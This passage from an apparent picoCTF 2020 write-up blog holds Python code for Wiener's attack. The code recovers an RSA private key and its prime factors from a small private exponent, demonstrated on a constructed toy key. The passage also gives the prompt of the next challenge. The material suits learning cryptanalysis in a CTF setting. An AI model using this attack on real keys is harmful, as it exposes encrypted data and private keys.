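    """Yield the continued-fraction convergents (top, bottom) of num/den."""
    top_prev, top = 0, 1
    bot_prev, bot = 1, 0
    while den:
        a, rem = divmod(num, den)
        top_prev, top = top, a * top + top_prev
        bot_prev, bot = bot, a * bot + bot_prev
        yield top, bot
        num, den = den, rem


def wiener_recover(e, n):
    """Return (d, p, q) if d is small enough for Wiener's method, else None.

    Since e*d = 1 + k*phi(n) and phi(n) is close to n, k/d appears among
    the convergents of e/n when d is smaller than roughly n**0.25 / 3.
    """
    for k, d in convergents(e, n):
        if k == 0 or (e * d - 1) % k:
            continue
        phi = (e * d - 1) // k
        s = n - phi + 1              # candidate p + q
        disc = s * s - 4 * n         # candidate (p - q)^2
        if disc < 0:
            continue
        root = isqrt(disc)
        if root * root != disc or (s + root) % 2:
            continue
        p, q = (s + root) // 2, (s - root) // 2
        if q > 1 and p * q == n:
            return d, p, q
    return None


# Constructed toy key: the large e is the sign of a small d
TOY_N, TOY_E = 90581, 17993


def demo():
    """Recover d for the toy key and decrypt a constructed message."""
    d, p, q = wiener_recover(TOY_E, TOY_N)
    message = 4242
    ciphertext = pow(message, TOY_E, TOY_N)
    return d, p, q, pow(ciphertext, d, TOY_N)


if __name__ == "__main__":
    print(demo())
    # Swapping the exponents gives a small e and a large d: nothing leaks.
    print(wiener_recover(5, TOY_N))
```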

john_pollard

[john_pollard](Sometimes RSA certificates are breakable)

The flag is in the format picoCTF{p,q}; Try swapping p and q if it does not work

  • Title: picoCTF2020
  • Author: 煤矿路口西
  • Created: 2021-03-22 20:43:25
  • Link: http://www.mklkx.xyz/2021/03/22/picoCTF2020/
  • Copyright: Unless otherwise stated, all articles on this blog are licensed under BY-NC-SA. Please credit the source when reposting!